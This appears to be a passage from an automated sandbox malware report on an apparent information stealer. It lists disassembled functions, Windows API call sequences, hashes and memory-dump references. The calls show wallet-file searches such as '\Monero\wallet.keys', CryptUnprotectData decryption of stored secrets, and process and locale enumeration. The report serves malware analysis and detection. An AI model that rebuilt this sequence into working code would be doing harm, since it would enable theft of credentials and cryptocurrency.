                              • Associated: 00000001.00000002.1472288268.0000000000EFC000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_850000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Findlstrcpy$File$CloseFirstNextlstrcatlstrlen
                              • String ID: \*.*
                              • API String ID: 2325840235-1173974218
                              • Opcode ID: 69ddf3af4dcb577898156d0deb52ea6e73753c79edf913666ec7afb0d9b65f52
                              • Instruction ID: 57e2c9b42f14c4e166e06caf422083c30a9e2ee1815acb2dfd78f7b84442e965
                              • Opcode Fuzzy Hash: 69ddf3af4dcb577898156d0deb52ea6e73753c79edf913666ec7afb0d9b65f52
                              • Instruction Fuzzy Hash: 15F19E719141189ADB19FB64CC96EEE7338FF54300F9141EAA51AB2091EF346B8ACF53
                              Function 0085DA80 Relevance: 13.8, APIs: 9, Instructions: 255fileCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 0086A740: lstrcpy.KERNEL32(00870E17,00000000), ref: 0086A788
                                • Part of subcall function 0086A920: lstrcpy.KERNEL32(00000000,?), ref: 0086A972
                                • Part of subcall function 0086A920: lstrcat.KERNEL32(00000000), ref: 0086A982
                                • Part of subcall function 0086A9B0: lstrlen.KERNEL32(?,015C8AA0,?,\Monero\wallet.keys,00870E17), ref: 0086A9C5
                                • Part of subcall function 0086A9B0: lstrcpy.KERNEL32(00000000), ref: 0086AA04
                                • Part of subcall function 0086A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0086AA12
                                • Part of subcall function 0086A8A0: lstrcpy.KERNEL32(?,00870E17), ref: 0086A905
                              • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,008714B0,00870C2A), ref: 0085DAEB
                              • StrCmpCA.SHLWAPI(?,008714B4), ref: 0085DB33
                              • StrCmpCA.SHLWAPI(?,008714B8), ref: 0085DB49
                              • FindNextFileA.KERNEL32(000000FF,?), ref: 0085DDCC
                              • FindClose.KERNEL32(000000FF), ref: 0085DDDE
                              Memory Dump Source
                              • Source File: 00000001.00000002.1471297801.0000000000851000.00000040.00000001.01000000.00000003.sdmp, Offset: 00850000, based on PE: true
                              • Associated: 00000001.00000002.1471254512.0000000000850000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471297801.0000000000901000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471297801.000000000090D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471297801.0000000000932000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471297801.0000000000A9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471574405.0000000000AAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471574405.0000000000C3B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471574405.0000000000D18000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471574405.0000000000D3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471574405.0000000000D49000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471574405.0000000000D57000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1472073993.0000000000D58000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1472257619.0000000000EFB000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1472288268.0000000000EFC000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_850000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                              • String ID:
                              • API String ID: 3334442632-0
                              • Opcode ID: 91afabec8ff41a6905ba256132eb5f4e11e16d0e25c4bdc26ea90ede743c4e49
                              • Instruction ID: 609ec5b42582501ae6dc2e7e894d1d56d73d0f7be82ffbf10213d65a25cc7d9b
                              • Opcode Fuzzy Hash: 91afabec8ff41a6905ba256132eb5f4e11e16d0e25c4bdc26ea90ede743c4e49
                              • Instruction Fuzzy Hash: 96911F72A002049BCB18FBB4DC969ED737DFB94301F418569AD5AE6141EE349B098F93
                              Function 00C22A04 Relevance: 11.6, Strings: 8, Instructions: 1624COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.1471574405.0000000000AAE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00850000, based on PE: true
                              • Associated: 00000001.00000002.1471254512.0000000000850000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471297801.0000000000851000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471297801.0000000000901000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471297801.000000000090D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471297801.0000000000932000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471297801.0000000000A9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471574405.0000000000C3B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471574405.0000000000D18000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471574405.0000000000D3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471574405.0000000000D49000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471574405.0000000000D57000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1472073993.0000000000D58000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1472257619.0000000000EFB000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1472288268.0000000000EFC000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_850000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: 3MG$6|fM$CK|}$EE}$I7_}$jy$rY$vY
                              • API String ID: 0-1416352975
                              • Opcode ID: a758d94da89028957a9660dab8fd913aee4acca6ee049b83e34a528634fcdd95
                              • Instruction ID: 37d0b5c6713ef51b7335e90e9db993bee65bbce4a56859a523a7c436d4a0229f
                              • Opcode Fuzzy Hash: a758d94da89028957a9660dab8fd913aee4acca6ee049b83e34a528634fcdd95
                              • Instruction Fuzzy Hash: D6B2F5F3608204AFE3046E2DEC8577AFBE9EF94620F1A493DEAC5C7740E63558058697
                              Function 00C2B3AF Relevance: 11.6, Strings: 8, Instructions: 1576COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.1471574405.0000000000AAE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00850000, based on PE: true
                              • Associated: 00000001.00000002.1471254512.0000000000850000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471297801.0000000000851000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471297801.0000000000901000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471297801.000000000090D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471297801.0000000000932000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471297801.0000000000A9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471574405.0000000000C3B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471574405.0000000000D18000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471574405.0000000000D3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471574405.0000000000D49000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471574405.0000000000D57000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1472073993.0000000000D58000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1472257619.0000000000EFB000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1472288268.0000000000EFC000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_850000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: %/t$7lW'$8_$A;7{$JE?$Xc?$c={$I{
                              • API String ID: 0-741620519
                              • Opcode ID: f9f51ba3616659720488a8075f0dec9351ccd970e666dab94d8a3c8a34142ece
                              • Instruction ID: 4729692b4613420f9088bc915eb09c0764388bb833ce34fc5c939ee3b68198ac
                              • Opcode Fuzzy Hash: f9f51ba3616659720488a8075f0dec9351ccd970e666dab94d8a3c8a34142ece
                              • Instruction Fuzzy Hash: 83B2F3F360C204AFE314AE29EC85A7AFBE9EF94720F16493DE6C4C7740E67558018697
                              Function 00867B90 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 114memoryCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 0086A740: lstrcpy.KERNEL32(00870E17,00000000), ref: 0086A788
                              • GetKeyboardLayoutList.USER32(00000000,00000000,008705AF), ref: 00867BE1
                              • LocalAlloc.KERNEL32(00000040,?), ref: 00867BF9
                              • GetKeyboardLayoutList.USER32(?,00000000), ref: 00867C0D
                              • GetLocaleInfoA.KERNEL32(?,00000002,?,00000200), ref: 00867C62
                              • LocalFree.KERNEL32(00000000), ref: 00867D22
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.1471297801.0000000000851000.00000040.00000001.01000000.00000003.sdmp, Offset: 00850000, based on PE: true
                              • Associated: 00000001.00000002.1471254512.0000000000850000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471297801.0000000000901000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471297801.000000000090D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471297801.0000000000932000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471297801.0000000000A9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471574405.0000000000AAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471574405.0000000000C3B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471574405.0000000000D18000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471574405.0000000000D3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471574405.0000000000D49000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471574405.0000000000D57000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1472073993.0000000000D58000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1472257619.0000000000EFB000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1472288268.0000000000EFC000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_850000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: KeyboardLayoutListLocal$AllocFreeInfoLocalelstrcpy
                              • String ID: /
                              • API String ID: 3090951853-4001269591
                              • Opcode ID: ae580c94aeee6de5d43c9a9bcdadadeb11f1c96d77358107f12946614ba2e18e
                              • Instruction ID: 99939690e7fa5b7b7f972a2e9215a359454f673ae16267ed9ba032f73f67ab97
                              • Opcode Fuzzy Hash: ae580c94aeee6de5d43c9a9bcdadadeb11f1c96d77358107f12946614ba2e18e
                              • Instruction Fuzzy Hash: 3A414D71940218ABCB24DF98DC99BEEB774FF54704F204199E509B2290DB342F86CFA2
                              Function 0085E430 Relevance: 9.3, APIs: 4, Strings: 1, Instructions: 514fileCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 0086A740: lstrcpy.KERNEL32(00870E17,00000000), ref: 0086A788
                                • Part of subcall function 0086A920: lstrcpy.KERNEL32(00000000,?), ref: 0086A972
                                • Part of subcall function 0086A920: lstrcat.KERNEL32(00000000), ref: 0086A982
                                • Part of subcall function 0086A9B0: lstrlen.KERNEL32(?,015C8AA0,?,\Monero\wallet.keys,00870E17), ref: 0086A9C5
                                • Part of subcall function 0086A9B0: lstrcpy.KERNEL32(00000000), ref: 0086AA04
                                • Part of subcall function 0086A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0086AA12
                                • Part of subcall function 0086A8A0: lstrcpy.KERNEL32(?,00870E17), ref: 0086A905
                              • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,\*.*,00870D73), ref: 0085E4A2
                              • StrCmpCA.SHLWAPI(?,008714F8), ref: 0085E4F2
                              • StrCmpCA.SHLWAPI(?,008714FC), ref: 0085E508
                              • FindNextFileA.KERNEL32(000000FF,?), ref: 0085EBDF
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.1471297801.0000000000851000.00000040.00000001.01000000.00000003.sdmp, Offset: 00850000, based on PE: true
                              • Associated: 00000001.00000002.1471254512.0000000000850000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471297801.0000000000901000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471297801.000000000090D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471297801.0000000000932000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471297801.0000000000A9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471574405.0000000000AAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471574405.0000000000C3B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471574405.0000000000D18000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471574405.0000000000D3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471574405.0000000000D49000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471574405.0000000000D57000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1472073993.0000000000D58000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1472257619.0000000000EFB000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1472288268.0000000000EFC000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_850000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$FileFindlstrcat$FirstNextlstrlen
                              • String ID: \*.*
                              • API String ID: 433455689-1173974218
                              • Opcode ID: cbb3f1d4943d71264007b0790770df00d5cfd6e3b95c34b4fb61e31a0858f134
                              • Instruction ID: da0d662e043c35c73330155d094380d7e0689a372e37a19c383f88d5a96664aa
                              • Opcode Fuzzy Hash: cbb3f1d4943d71264007b0790770df00d5cfd6e3b95c34b4fb61e31a0858f134
                              • Instruction Fuzzy Hash: FA122B719101189ADB1CFBA8DC96AEE7339FB54300F4141A9A51AE3191EE346F49CF93
                              Function 00C244E7 Relevance: 9.1, Strings: 6, Instructions: 1603COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.1471574405.0000000000AAE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00850000, based on PE: true
                              • Associated: 00000001.00000002.1471254512.0000000000850000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471297801.0000000000851000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471297801.0000000000901000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471297801.000000000090D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471297801.0000000000932000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471297801.0000000000A9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471574405.0000000000C3B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471574405.0000000000D18000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471574405.0000000000D3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471574405.0000000000D49000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471574405.0000000000D57000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1472073993.0000000000D58000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1472257619.0000000000EFB000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1472288268.0000000000EFC000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_850000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: #GCL$LulE$ho*X$sMwq$?=$u
                              • API String ID: 0-2028790609
                              • Opcode ID: 82d1c2ece3d40f7dfe8a200b527745b8db854095d0fe2d29f92339c886aa1cdb
                              • Instruction ID: d8bd0ffa334f3ac250c0d35a1fb5ed9a03f902a2b1487134efa0e0e3020b485b
                              • Opcode Fuzzy Hash: 82d1c2ece3d40f7dfe8a200b527745b8db854095d0fe2d29f92339c886aa1cdb
                              • Instruction Fuzzy Hash: 87B206F360C2049FE304AE29EC8567AFBE9EBD4720F16893DE6C4C7744EA3558058697
                              Function 00C2982C Relevance: 7.9, Strings: 5, Instructions: 1671COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.1471574405.0000000000AAE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00850000, based on PE: true
                              • Associated: 00000001.00000002.1471254512.0000000000850000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471297801.0000000000851000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471297801.0000000000901000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471297801.000000000090D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471297801.0000000000932000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471297801.0000000000A9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471574405.0000000000C3B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471574405.0000000000D18000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471574405.0000000000D3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471574405.0000000000D49000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471574405.0000000000D57000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1472073993.0000000000D58000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1472257619.0000000000EFB000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1472288268.0000000000EFC000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_850000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: S>w$UbW}$*w$*w$Z
                              • API String ID: 0-1771617775
                              • Opcode ID: fffce68c77e325023e7340825804abcff1fb7ca9849a6442a782e6ea002376e3
                              • Instruction ID: 0bc51e55034d0acddb491a56e1d8eb9a8d1be78399da6d3e0ba746a0e6ac4d6a
                              • Opcode Fuzzy Hash: fffce68c77e325023e7340825804abcff1fb7ca9849a6442a782e6ea002376e3
                              • Instruction Fuzzy Hash: 2BB228B360C2049FE3046E2DEC8567BFBE9EF94720F1A493DE6C5C3744EA7558018696
                              Function 0085C820 Relevance: 7.6, APIs: 5, Instructions: 95stringencryptionCOMMON
                              Download Yara Rule
                              APIs
                              • lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000), ref: 0085C871
                              • CryptStringToBinaryA.CRYPT32(?,00000000), ref: 0085C87C
                              • lstrcat.KERNEL32(?,00870B46), ref: 0085C943
                              • lstrcat.KERNEL32(?,00870B47), ref: 0085C957
                              • lstrcat.KERNEL32(?,00870B4E), ref: 0085C978
                              Memory Dump Source
                              • Source File: 00000001.00000002.1471297801.0000000000851000.00000040.00000001.01000000.00000003.sdmp, Offset: 00850000, based on PE: true
                              • Associated: 00000001.00000002.1471254512.0000000000850000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471297801.0000000000901000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471297801.000000000090D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471297801.0000000000932000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471297801.0000000000A9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471574405.0000000000AAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471574405.0000000000C3B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471574405.0000000000D18000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471574405.0000000000D3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471574405.0000000000D49000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471574405.0000000000D57000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1472073993.0000000000D58000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1472257619.0000000000EFB000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1472288268.0000000000EFC000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_850000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcat$BinaryCryptStringlstrlen
                              • String ID:
                              • API String ID: 189259977-0
                              • Opcode ID: 07b8df44741791f349f2ce8a10ec67b6fa83664e36cc757360e6bd1da390e17b
                              • Instruction ID: 854c20d8440e6f752e958fd71aa7f6eb6a5be296b407e72b1521cf3c90c66c09
                              • Opcode Fuzzy Hash: 07b8df44741791f349f2ce8a10ec67b6fa83664e36cc757360e6bd1da390e17b
                              • Instruction Fuzzy Hash: E1417175A0420ADFDB10DF94DC89BEEB7B8FB48304F1041A9F509A6280DB745B85CF91
                              Function 00857240 Relevance: 7.5, APIs: 5, Instructions: 48memoryencryptionCOMMON
                              Download Yara Rule
                              APIs
                              • GetProcessHeap.KERNEL32(00000008,00000400), ref: 0085724D
                              • RtlAllocateHeap.NTDLL(00000000), ref: 00857254
                              • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 00857281
                              • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,00000400,00000000,00000000), ref: 008572A4
                              • LocalFree.KERNEL32(?), ref: 008572AE
                              Memory Dump Source
                              • Source File: 00000001.00000002.1471297801.0000000000851000.00000040.00000001.01000000.00000003.sdmp, Offset: 00850000, based on PE: true
                              • Associated: 00000001.00000002.1471254512.0000000000850000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471297801.0000000000901000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471297801.000000000090D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471297801.0000000000932000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471297801.0000000000A9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471574405.0000000000AAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471574405.0000000000C3B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471574405.0000000000D18000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471574405.0000000000D3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471574405.0000000000D49000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471574405.0000000000D57000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1472073993.0000000000D58000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1472257619.0000000000EFB000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1472288268.0000000000EFC000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_850000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocateByteCharCryptDataFreeLocalMultiProcessUnprotectWide
                              • String ID:
                              • API String ID: 2609814428-0
                              • Opcode ID: 7b0c322ba427110057b3ac4d258b307cce56ff3a542367545693264cd4943ad5
                              • Instruction ID: cc31fe2a8d6a88601a0b90247f111f90d26391cf3ac574f79565ab1da75b8e1d
                              • Opcode Fuzzy Hash: 7b0c322ba427110057b3ac4d258b307cce56ff3a542367545693264cd4943ad5
                              • Instruction Fuzzy Hash: F201ED75B40208BBDB10DBD4DD4AF9E7778FB44705F108156FB05EA2C0DA70AA058BA5
                              Function 00869600 Relevance: 7.5, APIs: 5, Instructions: 42processCOMMON
                              Download Yara Rule
                              APIs
                              • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0086961E
                              • Process32First.KERNEL32(00870ACA,00000128), ref: 00869632
                              • Process32Next.KERNEL32(00870ACA,00000128), ref: 00869647
                              • StrCmpCA.SHLWAPI(?,00000000), ref: 0086965C
                              • CloseHandle.KERNEL32(00870ACA), ref: 0086967A
                              Memory Dump Source
                              • Source File: 00000001.00000002.1471297801.0000000000851000.00000040.00000001.01000000.00000003.sdmp, Offset: 00850000, based on PE: true
                              • Associated: 00000001.00000002.1471254512.0000000000850000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471297801.0000000000901000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471297801.000000000090D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471297801.0000000000932000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471297801.0000000000A9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471574405.0000000000AAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471574405.0000000000C3B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471574405.0000000000D18000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471574405.0000000000D3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471574405.0000000000D49000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471574405.0000000000D57000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1472073993.0000000000D58000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1472257619.0000000000EFB000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1472288268.0000000000EFC000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_850000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                              • String ID:
                              • API String ID: 420147892-0
                              • Opcode ID: 90380aab1d4bdca929f29b1d34d9761af54a59b3a2b95f5dd4f7bcf363667341
                              • Instruction ID: 217bee468a3dff8c881b85bd662d22f4a0a72ca603164afe26c927d72a4e40ea
                              • Opcode Fuzzy Hash: 90380aab1d4bdca929f29b1d34d9761af54a59b3a2b95f5dd4f7bcf363667341
                              • Instruction Fuzzy Hash: 9201E9B5A00208ABCB14DFA5C948BEDB7F8FB58300F10818AE94AD6280DB749A41CF91
                              Function 00C27C24 Relevance: 6.7, Strings: 4, Instructions: 1707COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.1471574405.0000000000AAE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00850000, based on PE: true
                              • Associated: 00000001.00000002.1471254512.0000000000850000.00000004.00000001.01000000.00000003.sdmpDownload File
